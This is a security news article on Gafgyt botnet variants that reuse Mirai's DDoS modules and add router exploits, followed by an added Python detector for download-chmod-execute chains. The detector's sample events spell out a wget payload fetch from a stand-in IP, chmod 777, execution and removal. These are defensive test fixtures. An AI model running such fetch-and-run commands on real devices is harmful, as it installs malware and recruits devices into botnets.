Gafgyt Botnet Lifts DDoS Tricks from Mirai

The IoT-targeted malware has also added new exploits for initial compromise, for Huawei, Realtek and Dasan GPON devices.

Several variants of the Gafgyt Linux-based botnet malware family have incorporated code from the infamous Mirai botnet, researchers have discovered.

Gafgyt (a.k.a. Bashlite) is a botnet that was first uncovered in 2014. It targets vulnerable internet of things (IoT) devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale distributed denial-of-service (DDoS) attacks. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.

The latest variants have now incorporated several Mirai-based modules, according to research from Uptycs released Thursday, along with new exploits. Mirai variants and reuse of its code have become more common since the source code for the IoT botnet was released in October 2016.

The capabilities nicked from Mirai include various methods to carry out DDoS attacks, according to the research:

  • HTTP flooding, in which the botnet sends a large number of HTTP requests to a targeted server to overwhelm it;
  • UDP flooding, where the botnet sends several UDP packets to a victim server as a means of exhausting it;
  • Various TCP flood attacks, which exploit the normal three-way TCP handshake so that the victim server receives a heavy number of requests, resulting in the server becoming unresponsive;
  • And an STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.

Code comparison for the HTTP DDoS module between Gafgyt and Mirai. Source: Uptycs.

Meanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.

The Huawei exploit (CVE-2017-17215) and the Realtek exploit (CVE-2014-8361) are both used for remote code execution (RCE), to fetch and download the Gafgyt payload, according to the analysis.

“The Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using ‘wget’ command, fetches the payload,” according to Uptycs. “[It] gives the execution permission to payload using ‘chmod’ command, [and] executes the payload.”

The GPON exploit (CVE-2018-10561) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.

“The IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,” researchers added.

IoT Botnet Variants Abound

IoT botnets like Gafgyt are constantly evolving. For instance, researchers in March discovered what they said is the first variant of the Gafgyt botnet family to cloak its activity using the Tor network.

Mirai hasn’t disappeared either: a new variant of the botnet was recently discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices. Since mid-February, the variant has been targeting six known vulnerabilities – and three previously unknown ones – in order to infect systems and add them to a botnet.

It’s only the latest variant of Mirai to come to light. Last year, a version dubbed Mukashi was seen taking advantage of a pre-authentication command-injection vulnerability found in Zyxel NAS storage devices.

“Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,” Uptycs researchers said.

To protect against these kinds of botnet infections, users should regularly monitor for suspicious processes, events and network traffic spawned on the execution of any untrusted binary, researchers recommended. And, users should keep all systems and firmware updated with the latest releases and patches.
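One way to implement the process monitoring recommended above, as an added example that is not code from Uptycs or the original article: it correlates process-execution events to flag the download, chmod, execute sequence the researchers describe, and notes when the payload is removed afterward. The event format, the sample events, the 60-second window and the downloader names other than wget are assumptions.

```python
import shlex
from os.path import basename

DOWNLOADERS = {"wget", "curl", "tftp"}  # the article names wget only; others assumed
WINDOW = 60  # assumed limit, in seconds, between download and execution
# Constructed sample events: (timestamp in seconds, host, command line)
SAMPLE_EVENTS = [
    (100, "router-a", "wget http://192.0.2.10/payload.mips -O /tmp/payload.mips"),
    (101, "router-a", "chmod 777 /tmp/payload.mips"),
    (102, "router-a", "/tmp/payload.mips"),
    (103, "router-a", "rm -f /tmp/payload.mips"),
    (200, "router-b", "wget http://198.51.100.7/firmware.bin -O /tmp/firmware.bin"),
    (900, "router-b", "chmod 644 /tmp/firmware.bin"),
]

def grants_exec(mode):
    """True if a chmod mode argument sets any execute bit."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode.split("+", 1)[1]

def download_target(argv):
    """Name of the file a downloader writes: -O/-o argument, else last URL segment."""
    for flag in ("-O", "-o"):
        if flag in argv[:-1]:
            return basename(argv[argv.index(flag) + 1])
    urls = [a for a in argv[1:] if "://" in a]
    return basename(urls[-1]) if urls else None

def detect_chains(events):
    """Alert on download -> chmod +x -> execute of the same file on one host."""
    state, alerts = {}, {}
    for ts, host, cmdline in sorted(events):
        argv = shlex.split(cmdline)
        prog = basename(argv[0]) if argv else ""
        if prog in DOWNLOADERS and download_target(argv):
            state[(host, download_target(argv))] = {"t0": ts, "exec_bit": False}
        elif prog == "chmod" and len(argv) >= 3 and grants_exec(argv[1]):
            for path in argv[2:]:
                if (host, basename(path)) in state:
                    state[(host, basename(path))]["exec_bit"] = True
        elif prog == "rm":  # the GPON variant can also remove the payload
            for key in {(host, basename(p)) for p in argv[1:]} & alerts.keys():
                alerts[key]["removed"] = True
        else:
            s = state.get((host, prog))
            if s and s["exec_bit"] and ts - s["t0"] <= WINDOW:
                alerts[(host, prog)] = {"host": host, "file": argv[0], "removed": False}
    return list(alerts.values())
```

Run over the sample events, only router-a is flagged; router-b downloads a file but never makes it executable or runs it.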
